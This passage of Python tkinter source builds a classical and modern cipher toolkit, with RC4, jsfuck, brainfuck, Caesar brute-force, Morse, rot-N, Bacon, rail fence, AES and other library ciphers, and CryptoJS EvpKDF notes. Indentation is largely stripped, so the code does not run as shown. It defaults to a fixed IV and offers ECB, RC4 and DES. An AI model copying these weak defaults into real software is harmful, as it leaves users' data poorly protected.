data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
encd = k201.get().strip('\n')
key = k200.get().strip('\n').encode(encd)
data = data.encode(encd)
mode = cbx201.get().strip()
try:
from . import pyrc4
except:
import pyrc4
if mode == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if mode == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if mode == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if mode == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
f = pyrc4.rc4(data, key, mode="decode", enfunc=_encode, defunc=_decode)
print(f.decode(encd))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rc4_code(*a):
try:
from . import pyrc4
except:
import pyrc4
ftxt.delete(0.,tkinter.END)
with open(pyrc4.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _swich_rc4_encd(*a):
s = k201.get().strip()
if s == 'utf-8':
k201.delete(0,tkinter.END)
k201.insert(0,'gbk')
elif s == 'gbk':
k201.delete(0,tkinter.END)
k201.insert(0,'utf-8')
else:
k201.delete(0,tkinter.END)
k201.insert(0,'utf-8')
cbx201 = Combobox(f202,width=4,state='readonly')
cbx201['values'] = ['b16','b32','b64','b85']
cbx201.current(2)
cbx201.pack(side=tkinter.RIGHT)
Label(f202, text='密码',width=4).pack(side=tkinter.LEFT,padx=5)
k200 = Entry(f202, width=17)
k200.pack(side=tkinter.LEFT)
Button(f202, text='[算法]',command=_rc4_code,width=5).pack(side=tkinter.RIGHT)
Button(f202, text='解密',command=_rc4_decode,width=5).pack(side=tkinter.RIGHT)
Button(f202, text='加密',command=_rc4_encode,width=5).pack(side=tkinter.RIGHT)
k201 = Entry(f202, width=5)
k201.pack(side=tkinter.RIGHT)
k201.insert(0,'utf-8')
Button(f202, text='密码/数据编码格式',command=_swich_rc4_encd).pack(side=tkinter.RIGHT)
# jsfuck decoding
fxpy0010 = Frame(ff0)
fxpy0010.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0012 = Frame(fxpy0010)
fxpy0012.pack(side=tkinter.TOP,fill=tkinter.X)
def _jsfuck_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyjsfuck
except:
import pyjsfuck
try:
if cbxejsfuck.get().strip() == '显示解密过程':
debuglevel = 1
else:
debuglevel = 0
f = pyjsfuck.unjsfuck(data, debuglevel=debuglevel, logger=print)
print()
print('[ result ]:')
print(f)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _jsfuck_code(*a):
try:
from . import pyjsfuck
except:
import pyjsfuck
ftxt.delete(0.,tkinter.END)
with open(pyjsfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0012, text='[算法]',command=_jsfuck_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0012, text=' 这里为 jsfuck 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0012, text='解密',command=_jsfuck_decode,width=5).pack(side=tkinter.RIGHT)
cbxejsfuck = Combobox(fxpy0012,width=11,state='readonly')
cbxejsfuck['values'] = ['显示解密过程', '不显示过程']
cbxejsfuck.current(0)
cbxejsfuck.pack(fill=tkinter.X,side=tkinter.RIGHT)
# brainfuck decoding
fxpy0070 = Frame(ff0)
fxpy0070.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0072 = Frame(fxpy0070)
fxpy0072.pack(side=tkinter.TOP,fill=tkinter.X)
def _brainfuck_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pybrainfuck
except:
import pybrainfuck
try:
v = pybrainfuck.evaluate(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _brainfuck_code(*a):
try:
from . import pybrainfuck
except:
import pybrainfuck
ftxt.delete(0.,tkinter.END)
with open(pybrainfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0072, text='[算法]',command=_brainfuck_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0072, text=' 这里为 brainfuck 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0072, text='brainfuck解密',command=_brainfuck_decode,width=12).pack(side=tkinter.RIGHT)
# Ook! decoding
fxpy0080 = Frame(ff0)
fxpy0080.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0082 = Frame(fxpy0080)
fxpy0082.pack(side=tkinter.TOP,fill=tkinter.X)
def _brainfuckook_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
a = brainfuckook_a.get().strip()
b = brainfuckook_b.get().strip()
c = brainfuckook_c.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybrainfuck
except:
import pybrainfuck
try:
data = pybrainfuck.parse_ook_to_brainfuckmap(data, abc = (a,b,c))
v = pybrainfuck.evaluate(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _brainfuckook_code(*a):
try:
from . import pybrainfuck
except:
import pybrainfuck
ftxt.delete(0.,tkinter.END)
with open(pybrainfuck.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0082, text='[算法]',command=_brainfuckook_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0082, text=' 这里为 Ook! 算法解密。').pack(side=tkinter.LEFT)
Button(fxpy0082, text='Ook!解密',command=_brainfuckook_decode,width=8).pack(side=tkinter.RIGHT)
brainfuckook_c = Entry(fxpy0082, width=2)
brainfuckook_c.insert(0, '.')
brainfuckook_c.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='c').pack(side=tkinter.RIGHT)
brainfuckook_b = Entry(fxpy0082, width=2)
brainfuckook_b.insert(0, '?')
brainfuckook_b.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='b').pack(side=tkinter.RIGHT)
brainfuckook_a = Entry(fxpy0082, width=2)
brainfuckook_a.insert(0, '!')
brainfuckook_a.pack(side=tkinter.RIGHT)
Label(fxpy0082, text='a').pack(side=tkinter.RIGHT)
# Caesar cipher
fxpy0020 = Frame(ff0)
fxpy0020.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0022 = Frame(fxpy0020)
fxpy0022.pack(side=tkinter.TOP,fill=tkinter.X)
def _caesar_enum(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
if len(data) > 1000:
print('注意,使用超过1000长度的的凯撒遍历处理时,请直接使用代码在 IDE 里面自行处理。')
for i in range(-13, 13, 1):
v = pycaesar.caesar(data, i)
if i == 0:print()
print('{:>3} --- {} '.format(i, v))
if i == 0:print()
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_encode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0022ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
deviation = int(deviation)
v = pycaesar.caesar(data, deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_decode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0022ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pycaesar
except:
import pycaesar
try:
deviation = int(deviation)
v = pycaesar.caesar(data, -deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _caesar_code(*a):
try:
from . import pycaesar
except:
import pycaesar
ftxt.delete(0.,tkinter.END)
with open(pycaesar.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0022, text='[算法]',command=_caesar_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0022, text=' 这里为 凯撒密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0022, text='遍历',command=_caesar_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0022, text='解密',command=_caesar_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0022, text='加密',command=_caesar_encode,width=5).pack(side=tkinter.RIGHT)
fxpy0022ent = Entry(fxpy0022, width=3)
fxpy0022ent.pack(side=tkinter.RIGHT)
fxpy0022ent.insert(0, '3')
Label(fxpy0022, text='偏移').pack(side=tkinter.RIGHT)
# ASCII-offset cipher
fxpy0060 = Frame(ff0)
fxpy0060.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0062 = Frame(fxpy0060)
fxpy0062.pack(side=tkinter.TOP,fill=tkinter.X)
def _ascii_dev_enum(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
if len(data) > 1000:
print('注意,使用超过1000长度的的凯撒遍历处理时,请直接使用代码在 IDE 里面自行处理。')
for i in range(-20, 20, 1):
v = pyascii_deviation.ascii_deviation(data, i)
if i == 0:print()
print('{:>3} --- {} '.format(i, v))
if i == 0:print()
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _ascii_dev_encode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0062ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
deviation = int(deviation)
v = pyascii_deviation.ascii_deviation(data, deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _ascii_dev_decode():
data = ftxt.get(0.,tkinter.END).strip('\n')
deviation = fxpy0062ent.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyascii_deviation
except:
import pyascii_deviation
try:
deviation = int(deviation)
v = pyascii_deviation.ascii_deviation(data, -deviation)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _ascii_dev_code(*a):
try:
from . import pyascii_deviation
except:
import pyascii_deviation
ftxt.delete(0.,tkinter.END)
with open(pyascii_deviation.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0062, text='[算法]',command=_ascii_dev_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0062, text=' 这里为 ascii偏移 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0062, text='遍历',command=_ascii_dev_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0062, text='解密',command=_ascii_dev_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0062, text='加密',command=_ascii_dev_encode,width=5).pack(side=tkinter.RIGHT)
fxpy0062ent = Entry(fxpy0062, width=3)
fxpy0062ent.pack(side=tkinter.RIGHT)
fxpy0062ent.insert(0, '3')
Label(fxpy0062, text='偏移').pack(side=tkinter.RIGHT)
# Morse code
fxpy0030 = Frame(ff0)
fxpy0030.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0032 = Frame(fxpy0030)
fxpy0032.pack(side=tkinter.TOP,fill=tkinter.X)
def _morse_encode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
point = morse_point.get().strip()
line = morse_line.get().strip()
space = morse_space.get().strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pymorse
except:
import pymorse
try:
v = pymorse.morse_enc(data, point, line, space)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _morse_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
point = morse_point.get().strip()
line = morse_line.get().strip()
space = morse_space.get().strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pymorse
except:
import pymorse
try:
v = pymorse.morse_dec(data, point, line, space)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _morse_code(*a):
try:
from . import pymorse
except:
import pymorse
ftxt.delete(0.,tkinter.END)
with open(pymorse.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0032, text='[算法]',command=_morse_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0032, text=' 这里为 莫斯密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0032, text='解密',command=_morse_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0032, text='加密',command=_morse_encode,width=5).pack(side=tkinter.RIGHT)
morse_space = Entry(fxpy0032, width=2)
morse_space.insert(0, ' ')
morse_space.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='空格').pack(side=tkinter.RIGHT)
morse_line = Entry(fxpy0032, width=2)
morse_line.insert(0, '-')
morse_line.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='线').pack(side=tkinter.RIGHT)
morse_point = Entry(fxpy0032, width=2)
morse_point.insert(0, '.')
morse_point.pack(side=tkinter.RIGHT)
Label(fxpy0032, text='点').pack(side=tkinter.RIGHT)
# rot* encode/decode
fxpy0040 = Frame(ff0)
fxpy0040.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0042 = Frame(fxpy0040)
fxpy0042.pack(side=tkinter.TOP,fill=tkinter.X)
def _rots_encode_decode(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyrots
except:
import pyrots
try:
if cbxrots.get().strip() == 'rot5': encdec = pyrots.rot5
if cbxrots.get().strip() == 'rot13': encdec = pyrots.rot13
if cbxrots.get().strip() == 'rot18': encdec = pyrots.rot18
if cbxrots.get().strip() == 'rot47': encdec = pyrots.rot47
v = encdec(data)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rots_encode_decode_all(*a):
data = ftxt.get(0.,tkinter.END).strip('\n')
ftxt.delete(0.,tkinter.END)
try:
from . import pyrots
except:
import pyrots
try:
for name, encdec in (('rot5', pyrots.rot5), ('rot13', pyrots.rot13), ('rot18', pyrots.rot18), ('rot47', pyrots.rot47)):
    print('{:>6} --- {}'.format(name, encdec(data)))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rots_code(*a):
try:
from . import pyrots
except:
import pyrots
ftxt.delete(0.,tkinter.END)
with open(pyrots.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0042, text='[算法]',command=_rots_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0042, text=' 这里为 rot* 算法加解密。(rot18,rot47 部分加密数据的大小写无法还原)').pack(side=tkinter.LEFT)
Button(fxpy0042, text='加解密',command=_rots_encode_decode,width=5).pack(side=tkinter.RIGHT)
cbxrots = Combobox(fxpy0042,width=5,state='readonly')
cbxrots['values'] = ['rot5', 'rot13','rot18','rot47']
cbxrots.current(0)
cbxrots.pack(fill=tkinter.X,side=tkinter.RIGHT)
# Bacon cipher
fxpy0050 = Frame(ff0)
fxpy0050.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0052 = Frame(fxpy0050)
fxpy0052.pack(side=tkinter.TOP,fill=tkinter.X)
def _bacon_encode(*a):
data = ftxt.get(0.,tkinter.END).strip()
a = bacon_a.get().strip()
b = bacon_b.get().strip()
ver = cbxbaconver.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybacon
except:
import pybacon
try:
v = pybacon.bacon_enc(data, a, b, ver)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _bacon_decode(*a):
data = ftxt.get(0.,tkinter.END).strip()
a = bacon_a.get().strip()
b = bacon_b.get().strip()
ver = cbxbaconver.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pybacon
except:
import pybacon
try:
v = pybacon.bacon_dec(data, a, b, ver)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _bacon_code(*a):
try:
from . import pybacon
except:
import pybacon
ftxt.delete(0.,tkinter.END)
with open(pybacon.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0052, text='[算法]',command=_bacon_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0052, text=' 这里为 培根密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0052, text='解密',command=_bacon_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0052, text='加密',command=_bacon_encode,width=5).pack(side=tkinter.RIGHT)
bacon_b = Entry(fxpy0052, width=2)
bacon_b.insert(0, 'b')
bacon_b.pack(side=tkinter.RIGHT)
Label(fxpy0052, text='b').pack(side=tkinter.RIGHT)
bacon_a = Entry(fxpy0052, width=2)
bacon_a.insert(0, 'a')
bacon_a.pack(side=tkinter.RIGHT)
Label(fxpy0052, text='a').pack(side=tkinter.RIGHT)
cbxbaconver = Combobox(fxpy0052,width=3,state='readonly')
cbxbaconver['values'] = ['v1', 'v2']
cbxbaconver.current(0)
cbxbaconver.pack(fill=tkinter.X,side=tkinter.RIGHT)
# Rail fence cipher
fxpy0090 = Frame(ff0)
fxpy0090.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0092 = Frame(fxpy0090)
fxpy0092.pack(side=tkinter.TOP,fill=tkinter.X)
def _rail_fence_encode(*a):
data = ftxt.get(0.,tkinter.END).strip()
_num = rail_num.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
_num = int(_num)
v, _ = pyrail_fence.rail_fence_enc(data, _num)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_decode(*a):
data = ftxt.get(0.,tkinter.END).strip()
_num = rail_num.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
_num = int(_num)
v = pyrail_fence.rail_fence_dec(data, _num)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_enum(*a):
data = ftxt.get(0.,tkinter.END).strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
v = pyrail_fence.rail_fence_enum(data)
if not v:
print('cannot factorize. by len(string):{}'.format(len(data)))
return
for a,b,r in v:
print('{:>2} --- {}'.format(a, r))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_enummatrix(*a):
data = ftxt.get(0.,tkinter.END).strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
v = pyrail_fence.rail_fence_enum(data, return_matrix=True)
if not v:
print('cannot factorize. by len(string):{}'.format(len(data)))
return
for a,b,i in v:
print('--- {}x{} ---'.format(a,b))
for j in i:
r = ''
for k in list(j):
r += k + ' '
print(r.strip())
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_code(*a):
try:
from . import pyrail_fence
except:
import pyrail_fence
ftxt.delete(0.,tkinter.END)
with open(pyrail_fence.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0092, text='[算法]',command=_rail_fence_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0092, text=' 这里为 栅栏密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0092, text='遍历矩阵',command=_rail_fence_enummatrix,width=8).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='遍历',command=_rail_fence_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='解密',command=_rail_fence_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='加密',command=_rail_fence_encode,width=5).pack(side=tkinter.RIGHT)
rail_num = Entry(fxpy0092, width=2)
rail_num.insert(0, '2')
rail_num.pack(side=tkinter.RIGHT)
Label(fxpy0092, text='栅栏数').pack(side=tkinter.RIGHT)
_fr1 = Frame(fr)
enb.add(_fr1, text='依赖库加解密')
enb.pack()
enb_names[_fr1._name] = '依赖库加解密'
ff1 = Frame(_fr1)
ff1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
ff1_ = Frame(_fr1)
ff1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefr = Frame(ff1_)
txttitlefr.pack(side=tkinter.TOP)
Label(txttitlefr, text='使用以下文本框进行加解密 [仅忽略文本前后换行符,空格不忽略],显示限制字符数:').pack(side=tkinter.LEFT,padx=10)
entlimit2 = Entry(txttitlefr, width=10)
entlimit2.pack(side=tkinter.LEFT)
entlimit2.insert(0,'10000')
ctxt = Text(ff1_,font=ft)
ctxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
# The following algorithms rely on the cryptography package, which is more dependable than the pure-python code collected above
cryptographyhelps = '''
以下算法为依赖于 cryptography 库
由于使用了一个比较成熟的加密函数库,所以基本包含了常用的加解密算法
如有安装该加密库,则请尽量使用该库的算法实现。
不过还是有部分例如 twofish 以及 serpent 这里没有,在纯py算法中有实现。
#[*] AES len(key) [128, 192, 256] len(iv) 128
#[*] Camellia len(key) [128, 192, 256] len(iv) 128
#[*] SEED len(key) [128] len(iv) 128
# ChaCha20 len(key) [256] len(iv) 128 (nonce)
#[*] Blowfish len(key) range(32, 449, 8) len(iv) 64
#[*] CAST5 len(key) range(40, 129, 8) len(iv) 64
#[*] IDEA len(key) [128] len(iv) 64
#[*] TripleDES len(key) [64, 128, 192] len(iv) 64
#[*] DES len(key) [64, 128, 192] len(iv) 64
# ARC4 len(key) [40, 56, 64, 80, 128, 160, 192, 256] # 不使用iv
带有 [*] 的可以有不同的加密模式(cbc,ecb...),没有的,则该选项无效。
'''.strip('\n')
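# pymultialgo wraps the cryptography package. A minimal sketch of the underlying hazmat API
# (an assumption about pymultialgo's internals, shown here only for reference):
#   from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
#   from cryptography.hazmat.primitives import padding
#   padder = padding.PKCS7(128).padder()
#   padded = padder.update(b'some plaintext') + padder.finalize()
#   enc = Cipher(algorithms.AES(b'0123456789abcdef'), modes.CBC(b'0123456789abcdef')).encryptor()
#   ct = enc.update(padded) + enc.finalize()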
def f900_change_cbit_1(*content):
if content:
encd = f9001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f9001_cbit1['text'] = str(blen)+'bit'
return True
def f900_change_cbit_2(*content):
if content:
encd = f9001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f9002_cbit2['text'] = str(blen)+'bit'
return True
f900_change_cbit1 = root.register(f900_change_cbit_1)
f900_change_cbit2 = root.register(f900_change_cbit_2)
f9000 = Frame(ff1)
f9000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9000, text=cryptographyhelps,font=ft).pack(fill=tkinter.X,expand=True)
f9001 = Frame(ff1)
f9001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f90001_ent1 = Entry(f9001,width=17,validate='key',validatecommand=(f900_change_cbit1, '%P'))
f90001_ent1.pack(side=tkinter.LEFT)
f90001_ent1.bind('<Key>', f900_change_cbit1)
f9001_cbit1 = Label(f9001, text='0bit',width=6)
f9001_cbit1.pack(side=tkinter.LEFT,padx=6)
f9001_mode1 = Combobox(f9001,width=4,state='readonly')
f9001_mode1['values'] = ['b16','b32','b64','b85']
f9001_mode1.current(2)
f9001_mode1.pack(side=tkinter.RIGHT)
Label(f9001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f900swich_encd1(*a):
s = f9001_fent1.get().strip()
if s == 'utf-8':
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'gbk')
elif s == 'gbk':
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'utf-8')
else:
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'utf-8')
f900_change_cbit_1(f90001_ent1.get().strip())
f900_change_cbit_2(f90002_ent2.get().strip())
f9001_fent1 = Entry(f9001,width=5)
f9001_fent1.insert(0,'utf-8')
f9001_fent1.pack(side=tkinter.RIGHT)
Button(f9001, text='编码格式',command=_f900swich_encd1, width=7).pack(side=tkinter.RIGHT)
f9001_mode2 = Combobox(f9001,width=4,state='readonly')
f9001_mode2['values'] = ['cbc','cfb','ofb','ctr','ecb',]
f9001_mode2.current(0)
f9001_mode2.pack(side=tkinter.RIGHT)
Label(f9001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
Label(f9001, text='加密',).pack(side=tkinter.LEFT,padx=2)
f9001_mode3 = Combobox(f9001,width=6,state='readonly')
f9001_mode3['values'] = ['AES', 'ARC4', 'Blowfish', 'CAST5', 'Camellia', 'ChaCha20', 'IDEA', 'SEED', 'TripleDES', 'DES']
f9001_mode3.current(0)
f9001_mode3.pack(side=tkinter.LEFT)
f9002 = Frame(ff1)
f9002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f90002_ent2 = Entry(f9002,width=17,validate='key',validatecommand=(f900_change_cbit2, '%P'))
f90002_ent2.pack(side=tkinter.LEFT)
    f9002_cbit2 = Label(f9002, text='128bit',width=6)
f9002_cbit2.pack(side=tkinter.LEFT,padx=6)
f90002_ent2.insert(0,'1234567890123456')
Label(f9002, text='PADDING',).pack(side=tkinter.LEFT,padx=2)
f9002_mode4 = Combobox(f9002,width=7,state='readonly')
f9002_mode4['values'] = ['PKCS7', 'ANSIX923', 'None',]
f9002_mode4.current(0)
f9002_mode4.pack(side=tkinter.LEFT)
def _pymultialgo_encode(*a):
encd = f9001_fent1.get().strip()
mode = f9001_mode2.get().strip()
eout = f9001_mode1.get().strip()
key = f90001_ent1.get().strip().encode(encd)
iv = f90002_ent2.get().strip().encode(encd)
algo = f9001_mode3.get().strip()
padd = f9002_mode4.get().strip()
data = ctxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit2.get().strip())
ctxt.delete(0.,tkinter.END)
try:
from . import pymultialgo
except:
            # Avoid having pyaes installed when testing this script; parts of the pyaes source are broken.
import pymultialgo
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
encryptor = pymultialgo.get_encryptor(algo, key, iv, mode, padd)
edata = encryptor.encrypt(data)
en = _encode(edata).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _pymultialgo_decode(*a):
encd = f9001_fent1.get().strip()
mode = f9001_mode2.get().strip()
eout = f9001_mode1.get().strip()
key = f90001_ent1.get().strip().encode(encd)
iv = f90002_ent2.get().strip().encode(encd)
algo = f9001_mode3.get().strip()
padd = f9002_mode4.get().strip()
data = ctxt.get(0.,tkinter.END).strip('\n').encode(encd)
ctxt.delete(0.,tkinter.END)
try:
from . import pymultialgo
except:
            # Avoid having pyaes installed when testing this script; parts of the pyaes source are broken.
import pymultialgo
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
encryptor = pymultialgo.get_encryptor(algo, key, iv, mode, padd)
dc = encryptor.decrypt(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _pymultialgo_code(*a):
try:
from . import pymultialgo
except:
import pymultialgo
ctxt.delete(0.,tkinter.END)
with open(pymultialgo.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f9002, text='[算法]',command=_pymultialgo_code,width=5).pack(side=tkinter.RIGHT)
Button(f9002, text='解密',command=_pymultialgo_decode,width=5).pack(side=tkinter.RIGHT)
Button(f9002, text='加密',command=_pymultialgo_encode,width=5).pack(side=tkinter.RIGHT)
fevpkdflab = '''
以 U2FsdGVkX1 开头的加密数据相关
该种类的加密方式为 cryptojs 的默认加密方式,在某种程度上只需要密码即可解密
但是实际上使用的却是 CBC 模式(该模式需要设置偏移 iv参数)。
并且每次加密都能加密出不同的密文数据,但是却用密码都能解密出相同的原始数据,
目前这里暂时只提供了加解密算法代码。
加密算法伪代码:
salt <= os.urandom(8)
key,iv <= EvpKDF(realkey, salt) # 这里有简化,详细请看代码
encodedata <= encrypt(key, iv, CBC, data) # 通常为 cbc/pkcs7
result <= base64('Salted__' + salt + encodedata)
1) 生成随机盐
2) 通过真实 key 与盐算出固定加密用的 key,iv
3) 使用加密算法加密数据
4) 将标识头(Salted__)、盐和加密数据打包并进行 base64 就是加密数据,
因为标识头都是一样的,所以一般都是以 U2FsdGVkX1 开头的加密数据
'''.rstrip('\n')
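    # Illustrative sketch of the EvpKDF / EVP_BytesToKey derivation sketched above (MD5 based,
    # one iteration, as CryptoJS uses by default). This is an assumption of what the bundled
    # pyevpkdf module implements; the helper name _sketch_evp_bytes_to_key is hypothetical.
    def _sketch_evp_bytes_to_key(password, salt, key_len=32, iv_len=16):
        import hashlib
        derived = b''
        block = b''
        while len(derived) < key_len + iv_len:
            block = hashlib.md5(block + password + salt).digest()
            derived += block
        return derived[:key_len], derived[key_len:key_len + iv_len]  # (key, iv)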
